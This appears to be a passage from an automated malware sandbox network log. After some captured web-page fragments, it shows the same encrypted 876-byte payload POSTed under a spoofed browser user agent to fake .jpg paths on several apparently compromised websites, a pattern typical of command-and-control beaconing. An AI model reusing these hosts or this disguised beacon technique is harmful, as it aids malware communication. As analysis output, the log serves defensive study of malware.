20 44 61 74 61 6e 67 20 64 69 20 53 69 74 75 73 20 47 61 6d 69 6e 67 20 4f 6e 6c 69 6e 65 20 50 72 Data Ascii: :original_price:currency" content="IDR"/><meta property="product:sale_price:amount" content="10000.00"/><meta property="product:sale_price:currency" content="IDR"/><meta itemprop="name" content="PRINCEBET88 # Selamat Datang di Situs Gaming Online Pr
2024-09-09 10:07:30 UTC	1369	IN	Data Raw: 61 2e 22 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 61 67 65 73 2e 73 71 75 61 72 65 73 70 61 63 65 2d 63 64 6e 2e 63 6f 6d 22 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 69 6b 2f 6b 38 68 66 4c 37 6b 5a 7a 33 51 73 47 45 69 55 77 46 36 4d 33 52 58 44 4d 55 51 48 43 6c 68 42 59 6f 38 64 78 44 30 59 70 59 77 66 65 31 74 4a 58 6e 58 31 49 79 76 68 46 32 6a 74 46 52 5a 4c 46 52 6d 38 6a 44 6d 38 6a 52 53 33 6a 68 34 52 46 51 4a 68 77 32 6a 6b 6a 51 73 79 5a 52 4a 61 65 36 4d 4b 67 63 69 7a 53 65 79 38 53 4b 47 48 66 4f 31 6d 4d 79 4d 4d 65 4d 62 36 Data Ascii: a."/><link rel="preconnect" href="https://images.squarespace-cdn.com"><script type="text/javascript" src="//use.typekit.net/ik/k8hfL7kZz3QsGEiUwF6M3RXDMUQHClhBYo8dxD0YpYwfe1tJXnX1IyvhF2jtFRZLFRm8jDm8jRS3jh4RFQJhw2jkjQsyZRJae6MKgcizSey8SKGHfO1mMyMMeMb6
2024-09-09 10:07:30 UTC	1369	IN	Data Raw: 6d 2f 75 6e 69 76 65 72 73 61 6c 2f 73 63 72 69 70 74 73 2d 63 6f 6d 70 72 65 73 73 65 64 2f 65 78 74 72 61 63 74 2d 63 73 73 2d 6d 6f 6d 65 6e 74 2d 6a 73 2d 76 65 6e 64 6f 72 2d 36 66 31 31 37 64 62 34 65 62 37 66 64 34 33 39 32 33 37 35 2d 6d 69 6e 2e 65 6e 2d 55 53 2e 6a 73 22 5d 3b 20 7d 29 28 53 51 55 41 52 45 53 50 41 43 45 5f 52 4f 4c 4c 55 50 53 2c 20 27 73 71 75 61 72 65 73 70 61 63 65 2d 65 78 74 72 61 63 74 5f 63 73 73 5f 6d 6f 6d 65 6e 74 5f 6a 73 5f 76 65 6e 64 6f 72 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 73 72 63 3d 22 2f 2f 61 73 73 65 74 73 2e 73 71 75 61 72 65 73 70 61 63 65 2e 63 6f 6d 2f 75 6e 69 76 65 72 73 61 6c 2f 73 63 72 69 70 74 73 Data Ascii: m/universal/scripts-compressed/extract-css-moment-js-vendor-6f117db4eb7fd4392375-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-extract_css_moment_js_vendor');</script><script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts
2024-09-09 10:07:30 UTC	1369	IN	Data Raw: 6c 2f 73 63 72 69 70 74 73 2d 63 6f 6d 70 72 65 73 73 65 64 2f 63 6f 6d 6d 6f 6e 2d 76 65 6e 64 6f 72 73 2d 39 32 38 37 32 34 66 65 30 33 31 30 33 64 35 31 31 37 31 65 2d 6d 69 6e 2e 65 6e 2d 55 53 2e 6a 73 22 5d 3b 20 7d 29 28 53 51 55 41 52 45 53 50 41 43 45 5f 52 4f 4c 4c 55 50 53 2c 20 27 73 71 75 61 72 65 73 70 61 63 65 2d 63 6f 6d 6d 6f 6e 5f 76 65 6e 64 6f 72 73 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 73 72 63 3d 22 2f 2f 61 73 73 65 74 73 2e 73 71 75 61 72 65 73 70 61 63 65 2e 63 6f 6d 2f 75 6e 69 76 65 72 73 61 6c 2f 73 63 72 69 70 74 73 2d 63 6f 6d 70 72 65 73 73 65 64 2f 63 6f 6d 6d 6f 6e 2d 76 65 6e 64 6f 72 73 2d 39 32 38 37 32 34 66 65 30 33 31 Data Ascii: l/scripts-compressed/common-vendors-928724fe03103d51171e-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common_vendors');</script><script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-vendors-928724fe031
2024-09-09 10:07:30 UTC	1369	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 2f 61 73 73 65 74 73 2e 73 71 75 61 72 65 73 70 61 63 65 2e 63 6f 6d 2f 75 6e 69 76 65 72 73 61 6c 2f 73 74 79 6c 65 73 2d 63 6f 6d 70 72 65 73 73 65 64 2f 63 6f 6d 6d 65 72 63 65 2d 32 61 66 30 36 66 37 39 34 38 64 62 35 34 37 37 64 38 66 35 2d 6d 69 6e 2e 65 6e 2d 55 53 2e 63 73 73 22 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 72 6f 6c 6c 75 70 73 2c 20 6e 61 6d 65 29 20 7b 20 69 66 20 28 21 72 6f 6c 6c 75 70 73 5b 6e 61 6d 65 5d 29 20 7b 20 72 6f 6c 6c 75 70 73 5b 6e 61 6d 65 5d 20 3d 20 7b 7d 3b 20 7d 20 72 6f 6c 6c 75 70 73 5b 6e 61 6d 65 5d 2e 6a 73 20 3d 20 5b 22 2f 2f 61 73 73 65 74 73 2e 73 71 75 Data Ascii: <link rel="stylesheet" type="text/css" href="//assets.squarespace.com/universal/styles-compressed/commerce-2af06f7948db5477d8f5-min.en-US.css"><script>(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squ
2024-09-09 10:07:30 UTC	1369	IN	Data Raw: 31 61 34 36 34 35 2d 6d 69 6e 2e 65 6e 2d 55 53 2e 6a 73 22 7d 2c 22 73 71 75 61 72 65 73 70 61 63 65 2d 63 61 6c 65 6e 64 61 72 2d 62 6c 6f 63 6b 2d 72 65 6e 64 65 72 65 72 22 3a 7b 22 63 73 73 22 3a 22 2f 2f 61 73 73 65 74 73 2e 73 71 75 61 72 65 73 70 61 63 65 2e 63 6f 6d 2f 75 6e 69 76 65 72 73 61 6c 2f 73 74 79 6c 65 73 2d 63 6f 6d 70 72 65 73 73 65 64 2f 63 61 6c 65 6e 64 61 72 2d 62 6c 6f 63 6b 2d 72 65 6e 64 65 72 65 72 2d 30 65 33 36 31 33 39 38 62 37 37 32 33 63 39 64 63 36 33 65 2d 6d 69 6e 2e 65 6e 2d 55 53 2e 63 73 73 22 2c 22 6a 73 22 3a 22 2f 2f 61 73 73 65 74 73 2e 73 71 75 61 72 65 73 70 61 63 65 2e 63 6f 6d 2f 75 6e 69 76 65 72 73 61 6c 2f 73 63 72 69 70 74 73 2d 63 6f 6d 70 72 65 73 73 65 64 2f 63 61 6c 65 6e 64 61 72 2d 62 6c 6f 63 6b Data Ascii: 1a4645-min.en-US.js"},"squarespace-calendar-block-renderer":{"css":"//assets.squarespace.com/universal/styles-compressed/calendar-block-renderer-0e361398b7723c9dc63e-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/calendar-block
2024-09-09 10:07:30 UTC	1369	IN	Data Raw: 65 76 65 6e 74 73 2d 63 6f 6c 6c 65 63 74 69 6f 6e 2d 30 65 33 36 31 33 39 38 62 37 37 32 33 63 39 64 63 36 33 65 2d 6d 69 6e 2e 65 6e 2d 55 53 2e 63 73 73 22 2c 22 6a 73 22 3a 22 2f 2f 61 73 73 65 74 73 2e 73 71 75 61 72 65 73 70 61 63 65 2e 63 6f 6d 2f 75 6e 69 76 65 72 73 61 6c 2f 73 63 72 69 70 74 73 2d 63 6f 6d 70 72 65 73 73 65 64 2f 65 76 65 6e 74 73 2d 63 6f 6c 6c 65 63 74 69 6f 6e 2d 63 37 66 62 31 34 35 65 30 63 65 63 33 33 37 34 31 36 33 65 2d 6d 69 6e 2e 65 6e 2d 55 53 2e 6a 73 22 7d 2c 22 73 71 75 61 72 65 73 70 61 63 65 2d 66 6f 72 6d 2d 72 65 6e 64 65 72 69 6e 67 2d 75 74 69 6c 73 22 3a 7b 22 6a 73 22 3a 22 2f 2f 61 73 73 65 74 73 2e 73 71 75 61 72 65 73 70 61 63 65 2e 63 6f 6d 2f 75 6e 69 76 65 72 73 61 6c 2f 73 63 72 69 70 74 73 2d 63 6f Data Ascii: events-collection-0e361398b7723c9dc63e-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/events-collection-c7fb145e0cec3374163e-min.en-US.js"},"squarespace-form-rendering-utils":{"js":"//assets.squarespace.com/universal/scripts-co
2024-09-09 10:07:30 UTC	1369	IN	Data Raw: 73 61 6c 2f 73 74 79 6c 65 73 2d 63 6f 6d 70 72 65 73 73 65 64 2f 70 6f 70 75 70 2d 6f 76 65 72 6c 61 79 2d 62 32 62 66 37 64 66 34 34 30 32 65 32 30 37 63 64 37 32 63 2d 6d 69 6e 2e 65 6e 2d 55 53 2e 63 73 73 22 2c 22 6a 73 22 3a 22 2f 2f 61 73 73 65 74 73 2e 73 71 75 61 72 65 73 70 61 63 65 2e 63 6f 6d 2f 75 6e 69 76 65 72 73 61 6c 2f 73 63 72 69 70 74 73 2d 63 6f 6d 70 72 65 73 73 65 64 2f 70 6f 70 75 70 2d 6f 76 65 72 6c 61 79 2d 38 62 64 31 63 39 66 35 64 65 37 32 37 38 30 62 65 31 33 36 2d 6d 69 6e 2e 65 6e 2d 55 53 2e 6a 73 22 7d 2c 22 73 71 75 61 72 65 73 70 61 63 65 2d 70 72 6f 64 75 63 74 2d 71 75 69 63 6b 2d 76 69 65 77 22 3a 7b 22 63 73 73 22 3a 22 2f 2f 61 73 73 65 74 73 2e 73 71 75 61 72 65 73 70 61 63 65 2e 63 6f 6d 2f 75 6e 69 76 65 72 73 Data Ascii: sal/styles-compressed/popup-overlay-b2bf7df4402e207cd72c-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/popup-overlay-8bd1c9f5de72780be136-min.en-US.js"},"squarespace-product-quick-view":{"css":"//assets.squarespace.com/univers

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:31 UTC	294	OUT	POST /admin/graphic/tajahxayexuseayc.jpg HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 876 Host: vitoriaecoturismo.com.br
2024-09-09 10:07:31 UTC	876	OUT	Data Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23 Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e\|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
2024-09-09 10:07:31 UTC	143	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 09 Sep 2024 10:07:31 GMT Content-Type: text/html Content-Length: 146 Connection: close
2024-09-09 10:07:31 UTC	146	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:32 UTC	271	OUT	POST /admin/game/gatm.jpg HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 876 Host: georgemuncey.com
2024-09-09 10:07:32 UTC	876	OUT	Data Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23 Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e\|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
2024-09-09 10:07:33 UTC	757	IN	HTTP/1.1 301 Moved Permanently Server: openresty/1.15.8.3 Date: Mon, 09 Sep 2024 10:07:32 GMT Content-Length: 0 Connection: close Location: https://www.georgemuncey.com/admin/game/gatm.jpg Set-Cookie: TiPMix=68.75653079247495; path=/; HttpOnly; Domain=fabrik-hosted-ne.azurewebsites.net; Max-Age=3600; Secure; SameSite=None Set-Cookie: x-ms-routing-name=self; path=/; HttpOnly; Domain=fabrik-hosted-ne.azurewebsites.net; Max-Age=3600; Secure; SameSite=None Strict-Transport-Security: max-age=2592000 Request-Context: appId=cid-v1:64640e46-9cd2-4413-9485-c7395dd99be8 x-azure-ref: 20240909T100732Z-18486d4796dnz25jm2wgzasxzg00000002y000000000am6q X-Cache: CONFIG_NOCACHE Strict-Transport-Security: max-age=63072000; includeSubDomains; preload

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:33 UTC	213	OUT	GET /admin/game/gatm.jpg HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Host: www.georgemuncey.com
2024-09-09 10:07:34 UTC	717	IN	HTTP/1.1 404 Not Found Server: openresty/1.15.8.3 Date: Mon, 09 Sep 2024 10:07:34 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-store,no-cache Pragma: no-cache Set-Cookie: TiPMix=77.60889268289033; path=/; HttpOnly; Domain=fabrik-hosted-ne.azurewebsites.net; Max-Age=3600; Secure; SameSite=None Set-Cookie: x-ms-routing-name=self; path=/; HttpOnly; Domain=fabrik-hosted-ne.azurewebsites.net; Max-Age=3600; Secure; SameSite=None Strict-Transport-Security: max-age=2592000 Request-Context: appId=cid-v1:64640e46-9cd2-4413-9485-c7395dd99be8 x-azure-ref: 20240909T100733Z-15855465dc7b6hwv4tcxcnnqr00000000r1g000000005u3b X-Cache: CONFIG_NOCACHE
2024-09-09 10:07:34 UTC	9121	IN	Data Raw: 32 33 39 34 0d 0a 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 73 74 61 6e 64 61 72 64 2d 66 6f 6e 74 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 65 6f 72 67 65 6d 75 6e 63 65 79 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 66 61 62 72 69 6b 2e 69 6f 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: 2394<!DOCTYPE html><html class="no-js standard-fonts" lang="en-GB"> <head prefix="og: http://ogp.me/ns#"> <link rel="preconnect" href="https://www.georgemuncey.com"> <link rel="preconnect" href="//static.fabrik.io" />

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:35 UTC	276	OUT	POST /static/pictures/qbadcqiwyz.jpg HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 876 Host: nbva.co.uk
2024-09-09 10:07:35 UTC	876	OUT	Data Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23 Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e\|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
2024-09-09 10:07:36 UTC	594	IN	HTTP/1.1 503 Service Unavailable Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://nbva.co.uk/wp-json/>; rel="https://api.w.org/" x-litespeed-tag: 799_HTTP.404,799_HTTP.503 x-litespeed-cache-control: no-cache transfer-encoding: chunked date: Mon, 09 Sep 2024 10:07:36 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-09-09 10:07:36 UTC	774	IN	Data Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 5f 73 74 72 65 74 63 68 65 64 20 72 65 73 70 6f 6e 73 69 76 65 20 61 76 2d 70 72 65 6c 6f 61 64 65 72 2d 64 69 73 61 62 6c 65 64 20 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 74 6f 70 20 68 74 6d 6c 5f 6c 6f 67 6f 5f 6c 65 66 74 20 68 74 6d 6c 5f 6d 61 69 6e 5f 6e 61 76 5f 68 65 61 64 65 72 20 68 74 6d 6c 5f 6d 65 6e 75 5f 72 69 67 68 74 20 68 74 6d 6c 5f 73 6c 69 6d 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 74 69 63 6b 79 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 68 72 69 6e 6b 69 6e 67 5f 64 69 73 61 62 6c 65 64 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 74 6f 70 62 61 72 5f 61 63 74 69 76 65 20 68 74 6d Data Ascii: 10000<!DOCTYPE html><html lang="en-GB" class="html_stretched responsive av-preloader-disabled html_header_top html_logo_left html_main_nav_header html_menu_right html_slim html_header_sticky html_header_shrinking_disabled html_header_topbar_active htm

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:37 UTC	274	OUT	POST /content/pictures/efwjwa.jpg HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 876 Host: c-sprop.com
2024-09-09 10:07:37 UTC	876	OUT	Data Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23 Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e\|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
2024-09-09 10:07:37 UTC	350	IN	HTTP/1.1 403 Forbidden Date: Mon, 09 Sep 2024 10:07:37 GMT Content-Type: text/html Content-Length: 146 Connection: close X-Seen-By: T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLho2HUitPUf9N0/utZJ1PDYm++C2XkuTvnlRFg2XiSDL Server: Pepyaka X-Wix-Request-Id: 1725876457.2921179646686126538 X-Content-Type-Options: nosniff
2024-09-09 10:07:37 UTC	146	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>